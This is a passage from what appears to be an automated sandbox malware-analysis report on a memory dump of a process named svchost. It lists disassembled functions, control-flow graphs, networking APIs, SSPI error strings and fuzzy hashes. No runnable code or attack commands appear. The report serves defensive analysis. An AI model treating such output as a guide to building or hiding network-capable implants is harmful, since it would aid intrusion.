1327->1331 1332 173d0155f4e-173d0155f91 WSAGetLastError call 173d0157f90 call 173d0164bb0 1327->1332 1337 173d01560b3-173d01560cb call 173d01582d0 1330->1337 1338 173d0155fab-173d0155fad 1330->1338 1331->1332 1332->1311 1355 173d0155f97-173d0155fa9 call 173d01581a0 1332->1355 1342 173d015605b-173d015605d 1333->1342 1334->1333 1337->1320 1338->1320 1338->1342 1341->1338 1347 173d01560eb-173d0156124 call 173d01a3b60 call 173d0157f90 call 173d0164bb0 1341->1347 1342->1309 1347->1306 1355->1338
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$connect
                                                                • String ID: connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                                • API String ID: 375857812-3816509080
                                                                • Opcode ID: 9d4bbee65375004948dc6eb851de1c76ed46c69a0c6a21de92976749deb74100
                                                                • Instruction ID: 5c2e3984b6d0532dd2ef68f6a6a554e6392b1587107e00b8dc0cdd15f2018b60
                                                                • Opcode Fuzzy Hash: 9d4bbee65375004948dc6eb851de1c76ed46c69a0c6a21de92976749deb74100
                                                                • Instruction Fuzzy Hash: AE61C27A208A8485EB31DBA5D9543E9A7B0E346FE8F844222DE3D0F7D6EF64C645D340
                                                                Function 00000173D0152940 Relevance: 12.1, APIs: 8, Instructions: 67networkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: CriticalErrorLastSection$Leavefreememmove$Enterfreeaddrinfogetaddrinfomallocsend
                                                                • String ID:
                                                                • API String ID: 3198214216-0
                                                                • Opcode ID: e069468138294b0d42a7d9e2d196727a2492f3a9547db1b3114be7453674423a
                                                                • Instruction ID: 4804da9c37bb533e7c8a0f99d418aa5dae05ea7fee58247d97e573d601d0fecf
                                                                • Opcode Fuzzy Hash: e069468138294b0d42a7d9e2d196727a2492f3a9547db1b3114be7453674423a
                                                                • Instruction Fuzzy Hash: 8F31B036208A5186E7608FA5E48438EB3B0F745FD8FC40211DA6D5BBA4EF78C685D740
                                                                Function 00000173D01616F0 Relevance: 10.6, APIs: 7, Instructions: 123networkCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 1382 173d01616f0-173d0161717 getaddrinfo 1383 173d016171d-173d016172f 1382->1383 1384 173d016188e-173d0161899 1382->1384 1385 173d0161735-173d016173f 1383->1385 1386 173d016186e-173d0161877 WSASetLastError 1383->1386 1388 173d0161740-173d0161747 1385->1388 1387 173d016187d-173d016188a 1386->1387 1387->1384 1389 173d0161749 1388->1389 1390 173d016175e 1388->1390 1391 173d0161750-173d0161757 1389->1391 1392 173d0161760-173d0161766 1390->1392 1391->1391 1393 173d0161759-173d016175c 1391->1393 1394 173d0161768-173d016176d 1392->1394 1395 173d016176f-173d0161772 1392->1395 1393->1392 1396 173d016177d-173d0161782 1394->1396 1397 173d0161778 1395->1397 1398 173d0161815-173d016181c 1395->1398 1396->1398 1399 173d0161788-173d016178f 1396->1399 1397->1396 1398->1388 1400 173d0161822 1398->1400 1399->1398 1401 173d0161795-173d0161798 1399->1401 1402 173d016182a-173d016183c 1400->1402 1401->1398 1403 173d016179a-173d01617ad malloc 1401->1403 1404 173d0161844-173d0161847 1402->1404 1405 173d016183e freeaddrinfo 1402->1405 1406 173d0161824 1403->1406 1407 173d01617af-173d01617e9 memmove 1403->1407 1408 173d0161869-173d016186c 1404->1408 1409 173d0161849-173d016184c 1404->1409 1405->1404 1406->1402 1410 173d0161802-173d016180c 1407->1410 1411 173d01617eb-173d01617fd memmove 1407->1411 1408->1386 1408->1387 1412 173d0161865-173d0161867 1409->1412 1413 173d016184e 1409->1413 1415 173d0161812 1410->1415 1416 173d016180e 1410->1416 1411->1410 1412->1387 1414 173d0161850-173d0161863 free 1413->1414 1414->1412 1414->1414 1415->1398 1416->1415
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: memmove$ErrorLastfreefreeaddrinfogetaddrinfomalloc
                                                                • String ID:
                                                                • API String ID: 420754818-0
                                                                • Opcode ID: 5690689acaa421e89e377b4d98ad99c46781c34d9c6ee45bdbc63379844944fc
                                                                • Instruction ID: bb3dea3f50e688641a8238cd4ccf5be4dd30661171b139a8df7ca735251ce4f7
                                                                • Opcode Fuzzy Hash: 5690689acaa421e89e377b4d98ad99c46781c34d9c6ee45bdbc63379844944fc
                                                                • Instruction Fuzzy Hash: 2B41803A20974486EA758F92E94079DF3B5F748FE0F884515DEAD43B94EB38D541D700
                                                                Function 00000173D019E592 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_BAD_BINDINGS
                                                                • API String ID: 3939687465-4193802906
                                                                • Opcode ID: 4ae39aaba354ca312d6457255954bcf7a71cb4e06a228ebbb92d9d27a1cbc1c8
                                                                • Instruction ID: 6c72d9c02ac4d5fecee26dde1bafb998139e616c39405294b3cbc953c649ceb9
                                                                • Opcode Fuzzy Hash: 4ae39aaba354ca312d6457255954bcf7a71cb4e06a228ebbb92d9d27a1cbc1c8
                                                                • Instruction Fuzzy Hash: 9E01407921864086F6729B91F4913E9A2B5B788FD4FC40015EA6F02795FF7CC745E610
                                                                Function 00000173D019E5AD Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_CANNOT_INSTALL
                                                                • API String ID: 3939687465-3689135316
                                                                • Opcode ID: 50d27433e9ce647bc4f9590cf387356ba4aeaa3a2d0b820b697123033eebe261
                                                                • Instruction ID: f0431370680a5aaf3b2268b5bf9c6fe62b875b47844aa51bbbab02c7002be73c
                                                                • Opcode Fuzzy Hash: 50d27433e9ce647bc4f9590cf387356ba4aeaa3a2d0b820b697123033eebe261
                                                                • Instruction Fuzzy Hash: 5701407921864086F672AB91F4913E9A2B5B788FD4FC40015EA6F02795FF7CC745E610
                                                                Function 00000173D019E5A4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_BUFFER_TOO_SMALL
                                                                • API String ID: 3939687465-3213503683
                                                                • Opcode ID: f0a99ce0059c141c48ec04eda93cf9f360708583881361bae81ebbd9556a3f0d
                                                                • Instruction ID: 2593f59a66efec5bd4ca8f8e91e7eb5858176a4f871b91e8cb4a2772f19b7763
                                                                • Opcode Fuzzy Hash: f0a99ce0059c141c48ec04eda93cf9f360708583881361bae81ebbd9556a3f0d
                                                                • Instruction Fuzzy Hash: 8601807921860086F6729B91F4913E9A2B0B788FC4FC40021EA6F02790FF3CC745E610
                                                                Function 00000173D019E59B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_BAD_PKGID
                                                                • API String ID: 3939687465-428854770
                                                                • Opcode ID: e4821e884ca1c9353c5073079b8e784af184d8bf8c5e6d8cf8b8576c186c9ca4
                                                                • Instruction ID: d1281edeeb20b063d999ec9d0da5a8488e72b6198cfe80a67ed276659bee1549
                                                                • Opcode Fuzzy Hash: e4821e884ca1c9353c5073079b8e784af184d8bf8c5e6d8cf8b8576c186c9ca4
                                                                • Instruction Fuzzy Hash: 2001807921860086F6729B91F4913E9A2B0B788FC4FC40011EA6F02790FF3CC746E610
                                                                Function 00000173D019E5C8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_CERT_UNKNOWN
                                                                • API String ID: 3939687465-169894802
                                                                • Opcode ID: 18d95ea0c812e77af67839231a605aeb101d50a50e151c44ca4e4bce1f7a0bf6
                                                                • Instruction ID: da4fd882e077eeed66ebf23b1680b271c520a4a851249a4d276f11a2ed129865
                                                                • Opcode Fuzzy Hash: 18d95ea0c812e77af67839231a605aeb101d50a50e151c44ca4e4bce1f7a0bf6
                                                                • Instruction Fuzzy Hash: 2101807921860086F672AB91F4913E9A2B0B788FC4FC40011EA6F02790FF3CC745E610
                                                                Function 00000173D019E5BF Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_CERT_EXPIRED
                                                                • API String ID: 3939687465-3192465694
                                                                • Opcode ID: 441da43cf9e542e5edd50b273512c7b9ea22a4b41436016054700c454272f4ae
                                                                • Instruction ID: b8f4a442d06b8adfe0e468b2b9c6fda2f66d912d8efcca41ed2a91fa1b1be88e
                                                                • Opcode Fuzzy Hash: 441da43cf9e542e5edd50b273512c7b9ea22a4b41436016054700c454272f4ae
                                                                • Instruction Fuzzy Hash: 950180B921860086F672AB91F4913E9A2B0B788FC4FC40011EA6F02790FF3CC745E610
                                                                Function 00000173D019E5B6 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_CANNOT_PACK
                                                                • API String ID: 3939687465-1144097955
                                                                • Opcode ID: b67d73a2223d1d1db4298fc8e6e3aa8c67cbe50cf565ce810dca4f246a39bc46
                                                                • Instruction ID: 2406b4f5a65094335d91c785baee57382821561f027c3b48f48e899598711223
                                                                • Opcode Fuzzy Hash: b67d73a2223d1d1db4298fc8e6e3aa8c67cbe50cf565ce810dca4f246a39bc46
                                                                • Instruction Fuzzy Hash: 1501807921860086F6729B91F4913E9A2B0B788FC4FC40015EA6F02790FF3CC745E610
                                                                Function 00000173D019E5EC Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_CROSSREALM_DELEGATION_FAILURE
                                                                • API String ID: 3939687465-3852342135
                                                                • Opcode ID: 79225bff42c7f3756b2e0ba69c6c5bc578440328a4eb359beb1b3191571fa22f
                                                                • Instruction ID: d00f62771a89d95b96b3f07e4f52a7b1fe6e160cb8f5fe79a5c008eba2312042
                                                                • Opcode Fuzzy Hash: 79225bff42c7f3756b2e0ba69c6c5bc578440328a4eb359beb1b3191571fa22f
                                                                • Instruction Fuzzy Hash: 2301407921864086F672AB91F4913E9A2B5B788FD4FC40015EAAF02795FF7CC745E610
                                                                Function 00000173D019E5E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_CONTEXT_EXPIRED
                                                                • API String ID: 3939687465-1358876214
                                                                • Opcode ID: 61983125f33651b5802577ff577e31b0029aa78b3f8dc3bb7d7398845e948f08
                                                                • Instruction ID: b377b2b5385d94712b1edc3b36b181573217c439c9bc386081dd711bec578826
                                                                • Opcode Fuzzy Hash: 61983125f33651b5802577ff577e31b0029aa78b3f8dc3bb7d7398845e948f08
                                                                • Instruction Fuzzy Hash: AF01807921860086F6729B91F4913E9E2B0B788FC4FC40011EA6F02790FF3CC746E610
                                                                Function 00000173D019E5D4 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_CERT_WRONG_USAGE
                                                                • API String ID: 3939687465-3896346274
                                                                • Opcode ID: c523917cea4f88baa68328a1d349acba4bc64ba1872f12e598f7fb40ba3a4714
                                                                • Instruction ID: 6dc2b074fde1316518089e14a25c6d02af22b35db7f2ec7b3521cd6f9ecfe8d7
                                                                • Opcode Fuzzy Hash: c523917cea4f88baa68328a1d349acba4bc64ba1872f12e598f7fb40ba3a4714
                                                                • Instruction Fuzzy Hash: C501407921864086F672AB91F4913E9A2B5B788FD4FC40015EA6F02795FF7CC745E610
                                                                Function 00000173D019E610 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_DELEGATION_POLICY
                                                                • API String ID: 3939687465-829877842
                                                                • Opcode ID: d4d8b91f72fff87b202198528f23fdc910b22ffa6555036cbe69808ad8010e3e
                                                                • Instruction ID: 9a64bdb70ef382e60c95ec6bdcc88c84315f6d9e5a92aaf4edcc90abfdf568d9
                                                                • Opcode Fuzzy Hash: d4d8b91f72fff87b202198528f23fdc910b22ffa6555036cbe69808ad8010e3e
                                                                • Instruction Fuzzy Hash: BE01807921860086F6729B91F4913E9A2B0B788FC4FC40011EA6F02790FF3CC745E610
                                                                Function 00000173D019E604 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_DECRYPT_FAILURE
                                                                • API String ID: 3939687465-1043736155
                                                                • Opcode ID: 2c35cf236970ab930637a02230fddc1cfffb66284058033d907bb0a4ca484230
                                                                • Instruction ID: 729945cb5066fc09eb3058a3a4be2ed4c1aaa70ab93f0c7d5d1ef618d06030dd
                                                                • Opcode Fuzzy Hash: 2c35cf236970ab930637a02230fddc1cfffb66284058033d907bb0a4ca484230
                                                                • Instruction Fuzzy Hash: 5801807921860086F6729B91F4913E9A2B0B788FC4FC40011EA6F02790FF3CC746E610
                                                                Function 00000173D019E5F8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_CRYPTO_SYSTEM_INVALID
                                                                • API String ID: 3939687465-3331766186
                                                                • Opcode ID: b1bae386a3d65ff28abd1242a99fe727f19cf3943ac4257ccb029480fa423dac
                                                                • Instruction ID: 7ab0ca41704e1442dce530cf602dc06fb17bf207d671391d0d8a061091dc4c39
                                                                • Opcode Fuzzy Hash: b1bae386a3d65ff28abd1242a99fe727f19cf3943ac4257ccb029480fa423dac
                                                                • Instruction Fuzzy Hash: 6B01807921860086F6729B91F4913E9A2B0B788FC4FC40011EA6F02790FF3CC745E610
                                                                Function 00000173D019E628 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_DOWNGRADE_DETECTED
                                                                • API String ID: 3939687465-1814928707
                                                                • Opcode ID: e40e7ce7aaa022eaac0eb0474ca994afa18f010793b8621ccf14ea6f630dde15
                                                                • Instruction ID: aa69e2a897e0ec1275fd391b13d7c54a7c65fb90ea16bbd5da6b13a2b338dfd3
                                                                • Opcode Fuzzy Hash: e40e7ce7aaa022eaac0eb0474ca994afa18f010793b8621ccf14ea6f630dde15
                                                                • Instruction Fuzzy Hash: A501807921864086F6729B91F4913EAE2B0B788FC4FC40011EA6F02790FF3CC745E610
                                                                Function 00000173D019E61C Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmpDownload File
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast_errno
                                                                • String ID: %s (0x%08X) - %s$SEC_E_DELEGATION_REQUIRED
                                                                • API String ID: 3939687465-3988574617
                                                                • Opcode ID: 3a3bde5c9ab0fb7f7e326860c92128801c8b0d75ec7503537036e7543c7320be
                                                                • Instruction ID: f42acf84497becbbcbdb4375ee98e2c1ed2cc36fb060a90a61f68d26beee1542
